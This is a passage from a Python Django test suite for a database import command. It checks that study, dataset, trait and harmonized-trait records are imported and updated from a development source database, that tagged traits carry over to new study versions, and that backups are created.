study1_dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
study1_dataset2.source_study_version = study1_ssv2
study1_dataset2.i_date_added = study1_dataset1.i_date_added + timedelta(days=7)
study1_dataset2.i_date_changed = study1_dataset1.i_date_changed + timedelta(days=7)
study1_dataset2.created = study1_dataset1.created + timedelta(days=7)
study1_dataset2.modified = study1_dataset1.modified + timedelta(days=7)
study1_dataset2.save()
study2_dataset2 = copy(study2_dataset1)
study2_dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
study2_dataset2.source_study_version = study2_ssv2
study2_dataset2.i_date_added = study2_dataset1.i_date_added + timedelta(days=7)
study2_dataset2.i_date_changed = study2_dataset1.i_date_changed + timedelta(days=7)
study2_dataset2.created = study2_dataset1.created + timedelta(days=7)
study2_dataset2.modified = study2_dataset1.modified + timedelta(days=7)
study2_dataset2.save()
# Make two new traits from the two new datasets.
study1_trait2 = copy(study1_trait1)
study1_trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
study1_trait2.source_dataset = study1_dataset2
study1_trait2.i_date_added = study1_trait1.i_date_added + timedelta(days=7)
study1_trait2.i_date_changed = study1_trait1.i_date_changed + timedelta(days=7)
study1_trait2.created = study1_trait1.created + timedelta(days=7)
study1_trait2.modified = study1_trait1.modified + timedelta(days=7)
study1_trait2.save()
study2_trait2 = copy(study2_trait1)
study2_trait2.pk = max(models.SourceTrait.objects.values_list('pk', flat=True)) + 1
study2_trait2.source_dataset = study2_dataset2
study2_trait2.i_date_added = study2_trait1.i_date_added + timedelta(days=7)
study2_trait2.i_date_changed = study2_trait1.i_date_changed + timedelta(days=7)
study2_trait2.created = study2_trait1.created + timedelta(days=7)
study2_trait2.modified = study2_trait1.modified + timedelta(days=7)
study2_trait2.save()
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
CMD._apply_tags_to_new_sourcestudyversions(
sourcestudyversion_pks=[study1_ssv2.pk, study2_ssv2.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 4)
# Look for the new taggedtrait versions.
study1_taggedtrait2 = TaggedTrait.objects.get(trait=study1_trait2)
self.assertEqual(study1_taggedtrait2.previous_tagged_trait, study1_taggedtrait1)
self.assertEqual(study1_taggedtrait2.creator, user2)
study2_taggedtrait2 = TaggedTrait.objects.get(trait=study2_trait2)
self.assertEqual(study2_taggedtrait2.previous_tagged_trait, study2_taggedtrait1)
self.assertEqual(study2_taggedtrait2.creator, user2)
def test_no_updates_with_trait_missing_in_new_version(self):
"""Does not create any new tagged traits when the trait is not updated."""
# Make a taggedtrait from existing base test data.
trait1 = models.SourceTrait.objects.current().order_by('?').first()
ssv1 = trait1.source_dataset.source_study_version
dataset1 = trait1.source_dataset
tag = TagFactory.create()
# tag = TagFactory.create()
taggedtrait1 = TaggedTraitFactory.create(creator=self.user, trait=trait1, tag=tag)
DCCReview.objects.create(tagged_trait=taggedtrait1, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
self.assertEqual(TaggedTrait.objects.count(), 1)
# Make a new version of an existing ssv, dataset, and source trait.
ssv2 = copy(ssv1)
ssv2.i_version = ssv1.i_version + 1
ssv2.pk = max(models.SourceStudyVersion.objects.values_list('pk', flat=True)) + 1
ssv2.i_date_added = ssv1.i_date_added + timedelta(days=7)
ssv2.i_date_changed = ssv1.i_date_changed + timedelta(days=7)
ssv2.created = ssv1.created + timedelta(days=7)
ssv2.modified = ssv1.modified + timedelta(days=7)
ssv2.save()
dataset2 = copy(dataset1)
dataset2.pk = max(models.SourceDataset.objects.values_list('pk', flat=True)) + 1
dataset2.source_study_version = ssv2
dataset2.i_date_added = dataset1.i_date_added + timedelta(days=7)
dataset2.i_date_changed = dataset1.i_date_changed + timedelta(days=7)
dataset2.created = dataset1.created + timedelta(days=7)
dataset2.modified = dataset1.modified + timedelta(days=7)
dataset2.save()
# Do not create a new version of the trait in this new study version.
# Run _apply_tags_to_new_sourcestudyversions
user2 = UserFactory.create()
CMD._apply_tags_to_new_sourcestudyversions(sourcestudyversion_pks=[ssv2.pk], creator=user2)
self.assertEqual(TaggedTrait.objects.count(), 1)
# Look for the new taggedtrait version
self.assertEqual(TaggedTrait.objects.filter(creator=user2).count(), 0)
class MakeArgsTest(BaseTestDataTestCase):
"""Tests of the _make_[model]_args functions."""
def test_make_global_study_args_one_row_make_global_study_obj(self):
"""A GlobalStudy can be created from the args made from a row of test data."""
global_study_query = 'SELECT * FROM global_study;'
self.cursor.execute(global_study_query)
row_dict = self.cursor.fetchone()
field_types = {el[0]: el[1] for el in self.cursor.description}
global_study_args = CMD._make_global_study_args(CMD._fix_row(row_dict, field_types))
global_study = models.GlobalStudy(**global_study_args)
global_study.save()
self.assertIsInstance(global_study, models.GlobalStudy)
def test_make_study_args_one_row_make_study_obj(self):
"""A Study can be created from the args made from a row of test data."""
study_query = 'SELECT * FROM study;'
self.cursor.execute(study_query)
row_dict = self.cursor.fetchone()
# Have to make a models.GlobalStudy first.
global_study = factories.GlobalStudyFactory.create(i_id=row_dict['global_study_id'])
#
field_types = {el[0]: el[1] for el in self.cursor.description}
study_args = CMD._make_study_args(CMD._fix_row(row_dict, field_types))
study = models.Study(**study_args)
study.save()
self.assertIsInstance(study, models.Study)
def test_make_source_study_version_args_one_row_make_source_study_version_obj(self):
"""A SourceStudyVersion can be created from the args made from a row of test data."""
source_study_version_query = 'SELECT * FROM source_study_version;'
self.cursor.execute(source_study_version_query)
row_dict = self.cursor.fetchone()
# Have to make global study and study first.
global_study = factories.GlobalStudyFactory.create(i_id=1)
study = factories.StudyFactory.create(i_accession=row_dict['accession'], global_study=global_study)
#
field_types = {el[0]: el[1] for el in self.cursor.description}
source_study_version_args = CMD._make_source_study_version_args(CMD._fix_row(row_dict, field_types))
source_study_version = models.SourceStudyVersion(**source_study_version_args)
source_study_version.save()
self.assertIsInstance(source_study_version, models.SourceStudyVersion)
def test_make_subcohort_args_one_row_make_subcohort_obj(self):
"""A Subcohort can be created from the args made from a row of test data."""
subcohort_query = 'SELECT * FROM subcohort;'
self.cursor.execute(subcohort_query)
row_dict = self.cursor.fetchone()
# Have to make a models.GlobalStudy first.
global_study = factories.GlobalStudyFactory.create(i_id=row_dict['global_study_id'])
#
field_types = {el[0]: el[1] for el in self.cursor.description}
subcohort_args = CMD._make_subcohort_args(CMD._fix_row(row_dict, field_types))
subcohort = models.Subcohort(**subcohort_args)
subcohort.save()
self.assertIsInstance(subcohort, models.Subcohort)
def test_make_source_dataset_args_one_row_make_source_dataset_obj(self):
"""A SourceDataset can be created from the args made from a row of test data."""
source_dataset_query = 'SELECT * FROM source_dataset;'
self.cursor.execute(source_dataset_query)
row_dict = self.cursor.fetchone()
# Have to make global study, study, and source_study_version first.
global_study = factories.GlobalStudyFactory.create(i_id=1)
study = factories.StudyFactory.create(i_accession=1, global_study=global_study)
source_study_version = factories.SourceStudyVersionFactory.create(
i_id=row_dict['study_version_id'], study=study)
field_types = {el[0]: el[1] for el in self.cursor.description}
source_dataset_args = CMD._make_source_dataset_args(CMD._fix_row(row_dict, field_types))
#
source_dataset = models.SourceDataset(**source_dataset_args)
source_dataset.save()
self.assertIsInstance(source_dataset, models.SourceDataset)
def test_make_harmonized_trait_set_args_one_row_make_harmonized_trait_set_obj(self):
"""A HarmonizedTraitSet can be created from the args made from a row of test data."""
harmonized_trait_set_query = 'SELECT * FROM harmonized_trait_set;'
self.cursor.execute(harmonized_trait_set_query)
row_dict = self.cursor.fetchone()
field_types = {el[0]: el[1] for el in self.cursor.description}
harmonized_trait_set_args = CMD._make_harmonized_trait_set_args(CMD._fix_row(row_dict, field_types))
#
harmonized_trait_set = models.HarmonizedTraitSet(**harmonized_trait_set_args)
harmonized_trait_set.save()
self.assertIsInstance(harmonized_trait_set, models.HarmonizedTraitSet)
def test_make_allowed_update_reason_args_one_row_make_allowed_update_reason_obj(self):
"""A AllowedUpdateReason can be created from the args made from a row of test data."""
allowed_update_reason_query = 'SELECT * FROM allowed_update_reason;'
self.cursor.execute(allowed_update_reason_query)
row_dict = self.cursor.fetchone()
#
field_types = {el[0]: el[1] for el in self.cursor.description}
allowed_update_reason_args = CMD._make_allowed_update_reason_args(CMD._fix_row(row_dict, field_types))
allowed_update_reason = models.AllowedUpdateReason(**allowed_update_reason_args)
allowed_update_reason.save()
self.assertIsInstance(allowed_update_reason, models.AllowedUpdateReason)
def test_make_harmonized_trait_set_version_args_one_row_make_harmonized_trait_set_version_obj(self):
"""A HarmonizedTraitSetVersion can be created from the args made from a row of test data."""
harmonized_trait_set_version_query = 'SELECT * FROM harmonized_trait_set_version;'
self.cursor.execute(harmonized_trait_set_version_query)
row_dict = self.cursor.fetchone()
# Have to make a HarmonizedTraitSet first.
harmonized_trait_set = factories.HarmonizedTraitSetFactory.create(i_id=row_dict['harmonized_trait_set_id'])
#
field_types = {el[0]: el[1] for el in self.cursor.description}
harmonized_trait_set_version_args = CMD._make_harmonized_trait_set_version_args(
CMD._fix_row(row_dict, field_types))
harmonized_trait_set_version = models.HarmonizedTraitSetVersion(**harmonized_trait_set_version_args)
harmonized_trait_set_version.save()
self.assertIsInstance(harmonized_trait_set_version, models.HarmonizedTraitSetVersion)
def test_make_source_trait_args_one_row_make_source_trait_obj(self):
"""A SourceTrait can be created from the args made from a row of test data."""
source_trait_query = 'SELECT * FROM source_trait;'
self.cursor.execute(source_trait_query)
row_dict = self.cursor.fetchone()
# Have to make global study, study, source_study_version, and source_dataset first.
global_study = factories.GlobalStudyFactory.create(i_id=1)
study = factories.StudyFactory.create(i_accession=1, global_study=global_study)
source_study_version = factories.SourceStudyVersionFactory.create(i_id=1, study=study)
source_dataset = factories.SourceDatasetFactory.create(
i_id=row_dict['dataset_id'], source_study_version=source_study_version)
#
field_types = {el[0]: el[1] for el in self.cursor.description}
source_trait_args = CMD._make_source_trait_args(CMD._fix_row(row_dict, field_types))
source_trait = models.SourceTrait(**source_trait_args)
source_trait.save()
self.assertIsInstance(source_trait, models.SourceTrait)
def test_make_harmonized_trait_args_one_row_make_harmonized_trait_obj(self):
"""A HarmonizedTrait can be created from the args made from a row of test data."""
harmonized_trait_query = 'SELECT * FROM harmonized_trait;'
self.cursor.execute(harmonized_trait_query)
row_dict = self.cursor.fetchone()
# Have to make harmonized_trait_set first.
harmonized_trait_set_version = factories.HarmonizedTraitSetVersionFactory.create(
i_id=row_dict['harmonized_trait_set_version_id'])
#
field_types = {el[0]: el[1] for el in self.cursor.description}
harmonized_trait_args = CMD._make_harmonized_trait_args(CMD._fix_row(row_dict, field_types))
harmonized_trait = models.HarmonizedTrait(**harmonized_trait_args)
harmonized_trait.save()
self.assertIsInstance(harmonized_trait, models.HarmonizedTrait)
def test_make_source_trait_encoded_value_args_one_row_make_source_trait_encoded_value_obj(self):
"""A SourceTraitEncodedValue can be created from the args made from a row of test data."""
source_trait_encoded_value_query = 'SELECT * FROM source_trait_encoded_values;'
self.cursor.execute(source_trait_encoded_value_query)
row_dict = self.cursor.fetchone()
# Have to make global study, study, source_study_version, source_dataset, and source_trait first.
global_study = factories.GlobalStudyFactory.create(i_id=1)
study = factories.StudyFactory.create(i_accession=1, global_study=global_study)
source_study_version = factories.SourceStudyVersionFactory.create(i_id=1, study=study)
source_dataset = factories.SourceDatasetFactory.create(i_id=1, source_study_version=source_study_version)
source_trait = factories.SourceTraitFactory.create(
i_trait_id=row_dict['source_trait_id'], source_dataset=source_dataset)
field_types = {el[0]: el[1] for el in self.cursor.description}
fixed_row = CMD._fix_row(row_dict, field_types)
source_trait_encoded_value_args = CMD._make_source_trait_encoded_value_args(fixed_row)
source_trait_encoded_value = models.SourceTraitEncodedValue(**source_trait_encoded_value_args)
source_trait_encoded_value.save()
self.assertIsInstance(source_trait_encoded_value, models.SourceTraitEncodedValue)
def test_make_harmonized_trait_encoded_value_args_one_row_make_harmonized_trait_encoded_value_obj(self):
"""A HarmonizedTraitEncodedValue can be created from the args made from a row of test data."""
# Get a single harmonized_trait_encoded_value from the source db
harmonized_trait_encoded_value_query = 'SELECT * FROM harmonized_trait_encoded_values;'
self.cursor.execute(harmonized_trait_encoded_value_query)
row_dict = self.cursor.fetchone()
# Get information for the harmonized_trait the encoded value is connected to.
harmonized_trait_query = 'SELECT * FROM harmonized_trait WHERE harmonized_trait_id = {};'.format(
row_dict['harmonized_trait_id'])
self.cursor.execute(harmonized_trait_query)
harmonized_trait_row_dict = self.cursor.fetchone()
# Make a harmonized_trait and harmonized_trait_set before trying to make the encoded value object.
harmonized_trait = factories.HarmonizedTraitFactory.create(
i_trait_id=row_dict['harmonized_trait_id'],
harmonized_trait_set_version__i_id=harmonized_trait_row_dict['harmonized_trait_set_version_id'])
# Make the encoded value object.
field_types = {el[0]: el[1] for el in self.cursor.description}
fixed_row = CMD._fix_row(row_dict, field_types)
harmonized_trait_encoded_value_args = CMD._make_harmonized_trait_encoded_value_args(fixed_row)
harmonized_trait_encoded_value = models.HarmonizedTraitEncodedValue(**harmonized_trait_encoded_value_args)
harmonized_trait_encoded_value.save()
self.assertIsInstance(harmonized_trait_encoded_value, models.HarmonizedTraitEncodedValue)
class HelperTest(BaseTestDataTestCase):
"""Tests of the helper functions from import_db.Command()."""
def test_make_table_query(self):
"""Makes a valid query."""
query = CMD._make_table_query(source_table='study')
self.cursor.execute(query)
self.assertIsNotNone(self.cursor.fetchone())
def test_make_table_query_with_filter(self):
"""Makes a valid query."""
query = CMD._make_table_query(
source_table='study', filter_field='accession', filter_values=['286'], filter_not=False)
self.cursor.execute(query)
self.assertIsNotNone(self.cursor.fetchone())
def test_make_table_query_with_not_filter(self):
"""Makes a valid query."""
query = CMD._make_table_query(
source_table='study', filter_field='accession', filter_values=['286'], filter_not=True)
self.cursor.execute(query)
self.assertIsNotNone(self.cursor.fetchone())
def test_make_table_query_filter_values_empty(self):
"""Makes a valid query when filter_values is empty."""
query = CMD._make_table_query(
source_table='study', filter_field='accession', filter_values=[], filter_not=False)
self.cursor.execute(query)
self.assertIsNone(self.cursor.fetchone())
def test_make_global_study_from_args(self):
"""_make_model_object_from_args works to make a global study."""
CMD._make_model_object_from_args(
model_args={'i_id': 5, 'i_name': 'global study name', 'i_date_added': timezone.now(),
'i_date_changed': timezone.now()},
model=models.GlobalStudy)
obj = models.GlobalStudy.objects.get(pk=5)
self.assertIsInstance(obj, models.GlobalStudy)
def test_make_model_object_per_query_row_global_study(self):
"""Makes a study object for every row in a query result."""
# Test with global_study because it is not dependent on any other models.
query = 'SELECT * FROM global_study'
CMD._make_model_object_per_query_row(
source_db=self.source_db, query=query, make_args=CMD._make_global_study_args,
**{'model': models.GlobalStudy})
self.cursor.execute(query)
ids = [row['id'] for row in self.cursor.fetchall()]
imported_ids = [gs.i_id for gs in models.GlobalStudy.objects.all()]
self.assertEqual(sorted(ids), sorted(imported_ids))
def test_make_query_for_new_rows(self):
"""Makes a query that properly returns new rows of data from the study table."""
self.cursor.execute('SELECT * FROM study')
all_accessions = [row['accession'] for row in self.cursor.fetchall()]
old_pks = all_accessions[0:1]
query = CMD._make_query_for_new_rows('study', 'accession', [str(el) for el in old_pks])
self.cursor.execute(query)
retrieved_accessions = [row['accession'] for row in self.cursor.fetchall()]
for phs in all_accessions:
if phs in old_pks:
self.assertNotIn(phs, retrieved_accessions)
else:
self.assertIn(phs, retrieved_accessions)
# def test_make_args_mapping(self):
# Testing this function generically is not worth it, since it's already
# tested specifically multiple times in the MakeArgsTestCase
def test_import_new_data_global_study(self):
"""Imports data from the global_study correctly into the models.GlobalStudy model."""
new_global_study_pks = CMD._import_new_data(source_db=self.source_db,
source_table='global_study',
source_pk='id',
model=models.GlobalStudy,
make_args=CMD._make_global_study_args)
self.cursor.execute('SELECT * FROM global_study')
pks_in_db = [row['id'] for row in self.cursor.fetchall()]
imported_pks = [gs.pk for gs in models.GlobalStudy.objects.all()]
self.assertEqual(pks_in_db, imported_pks)
def test_make_query_for_rows_to_update_global_study(self):
"""Returns a query that contains only the updated rows."""
user = UserFactory.create()
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
# Data about how to make the update in the source db.
model = models.GlobalStudy
model_instance = model.objects.all()[0]
source_db_table_name = 'global_study'
field_to_update = 'name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
# Make the update in the source db.
old_pks = CMD._get_current_pks(models.GlobalStudy)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
# Make the query.
self.source_db = get_devel_db()
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
updated_query = CMD._make_query_for_rows_to_update(
source_db_table_name, model, old_pks, source_db_pk_name, changed_greater=True)
self.cursor.execute(updated_query)
updates = self.cursor.fetchall()
self.assertTrue(len(updates) == 1)
field_types = {el[0]: el[1] for el in self.cursor.description}
updated_row = CMD._fix_row(updates[0], field_types)
self.assertEqual(updated_row[field_to_update], new_value)
self.assertEqual(updated_row[source_db_pk_name], model_instance.pk)
def test_update_model_object_from_args_global_study(self):
"""Makes updates to a global study from model_args dict."""
global_study = factories.GlobalStudyFactory.create()
old_name = global_study.i_name
new_name = global_study.i_name + '_modified'
model_args = {'i_id': global_study.pk, 'i_name': new_name}
CMD._update_model_object_from_args(model_args, models.GlobalStudy, expected=True)
global_study.refresh_from_db()
self.assertEqual(global_study.i_name, new_name)
# def test_update_model_object_per_query_row(self):
# A test of this function would be almost exactly like the tests in the
# UpdateModelsTestCase, so I'm not writing another one here...
def test_update_existing_data_global_study(self):
"""Updates in global_study are imported."""
# Have to clean and reload the db because of updates in previous tests.
clean_devel_db()
load_test_source_db_data('base.sql')
user = UserFactory.create()
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
# Change the data in the source db.
model = models.GlobalStudy
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'global_study'
field_to_update = 'name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
# Need to open the db and cursor again...
self.source_db = get_devel_db()
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# This update is not technically expected, but get rid of the warning.
global_study_update_count = CMD._update_existing_data(
source_db=self.source_db, source_table='global_study', source_pk='id', model=models.GlobalStudy,
make_args=CMD._make_global_study_args, expected=True)
# Check that modified date > created date, and name is set to new value.
model_instance.refresh_from_db()
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
class BackupTest(TransactionTestCase):
"""Tests to make sure backing up the Django db in handle() is working right."""
@classmethod
def setUpClass(cls):
"""Load the base test data, once for all tests, and create a user."""
# Run the TestCase setUpClass method.
super().setUpClass()
# Clean out the devel db and load the first test dataset.
# By default, all tests will use dataset 1.
clean_devel_db()
load_test_source_db_data('base.sql')
# Can't create a test user here because of TransactionTestCase.
def setUp(self):
super().setUp()
self.user = UserFactory.create()
def test_backup_is_created(self):
"""Backup dump file is created in the expected directory."""
set_backup_dir()
# Import data from the source db.
management.call_command('import_db', '--devel_db',
'--taggedtrait_creator={}'.format(self.user.email))
# Does the backup dir exist?
self.assertTrue(exists(settings.DBBACKUP_STORAGE_OPTIONS['location']))
# Is there a single compressed dump file in there?
backup_files = listdir(settings.DBBACKUP_STORAGE_OPTIONS['location'])
self.assertTrue(len(backup_files) == 1)
self.assertTrue(backup_files[0].endswith('.dump.gz'))
# Is a reasonable size that would indicate it's not empty?
file_size = stat(join(settings.DBBACKUP_STORAGE_OPTIONS['location'], backup_files[0])).st_size
self.assertTrue(1000000000 > file_size > 100)
cleanup_backup_dir()
def test_backup_can_be_restored(self):
"""A saved backup can be used to restore the db to it's previous state."""
# TODO: Couldn't get the dbrestore command to work, so leaving this for later.
return None
set_backup_dir()
# Import data from the source db.
management.call_command('import_db', '--devel_db',
'--taggedtrait_creator={}'.format(self.user.email))
# Restore from the backup file.
# Make a new backup file after the restore.
# Is the contents of the new backup the same as the old?
cleanup_backup_dir()
class SpecialQueryTest(BaseTestDataTestCase):
"""Test the special queries saved as constant variables in import_db."""
def test_HUNIT_QUERY(self):
"""HUNIT_QUERY returns good results."""
self.cursor.execute(HUNIT_QUERY)
results = self.cursor.fetchall()
self.assertIn('harmonized_trait_id', results[0].keys())
self.assertIn('harmonization_unit_id', results[0].keys())
self.assertTrue(len(results) == 11) # Change if changing test data.
def test_HUNIT_QUERY_while_locked(self):
"""HUNIT_QUERY can still be run when db is locked."""
# Replicates this error from making new_harmonization_unit_harmonized_trait_links in _import_harmonized_tables:
# mysql.connector.errors.DatabaseError: 1100 (HY000): Table 'comp_source' was not locked with LOCK TABLES
CMD._lock_source_db(self.source_db)
self.cursor.execute(HUNIT_QUERY)
results = self.cursor.fetchall()
self.assertIn('harmonized_trait_id', results[0].keys())
self.assertIn('harmonization_unit_id', results[0].keys())
self.assertTrue(len(results) == 11) # Change if changing test data.
CMD._unlock_source_db(self.source_db)
class UpdateModelsTest(ClearSearchIndexMixin, BaseTestDataTestCase):
"""Tests of the update functions with updates to each possible source_db table."""
@classmethod
def setUpClass(cls):
"""Create a user."""
super().setUpClass()
cls.user = UserFactory.create()
# Source trait updates.
def test_update_global_study(self):
"""Updates in global_study are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.GlobalStudy
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'global_study'
field_to_update = 'name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_study(self):
"""Updates in study are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.Study
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'study'
field_to_update = 'study_name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_source_study_version(self):
"""Updates in source_study_version are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.SourceStudyVersion
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'source_study_version'
field_to_update = 'is_deprecated'
new_value = int(not getattr(model_instance, 'i_' + field_to_update))
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_source_dataset(self):
"""Updates in source_dataset table are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.SourceDataset
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'source_dataset'
field_to_update = 'dbgap_description'
new_value = 'asdgsdfg'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_subcohort(self):
"""Updates in subcohort are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.Subcohort
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'subcohort'
field_to_update = 'name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_source_trait(self):
"""Updates in source_trait table are imported and the search index is updated."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.SourceTrait
model_instance = model.objects.all().current()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'source_trait'
field_to_update = 'dbgap_description'
new_value = 'asdfghjkl'
source_db_pk_name = 'source_trait_id'
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_description'))
self.assertTrue(model_instance.modified > old_mod_time)
# Check that the trait can be found in the search index.
self.assertQuerysetEqual(watson.filter(models.SourceTrait, new_value), [repr(model_instance)])
def test_update_source_trait_encoded_value(self):
"""Updates in source_trait_encoded_values are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.SourceTraitEncodedValue
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'source_trait_encoded_values'
field_to_update = 'value'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
# Harmonized trait updates.
def test_update_harmonized_trait_set(self):
"""Updates to harmonized_trait_set are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizedTraitSet
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'harmonized_trait_set'
field_to_update = 'trait_set_name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_harmonized_trait_set_version(self):
"""Updates to harmonized_trait_set_version are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizedTraitSetVersion
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'harmonized_trait_set_version'
field_to_update = 'harmonized_by'
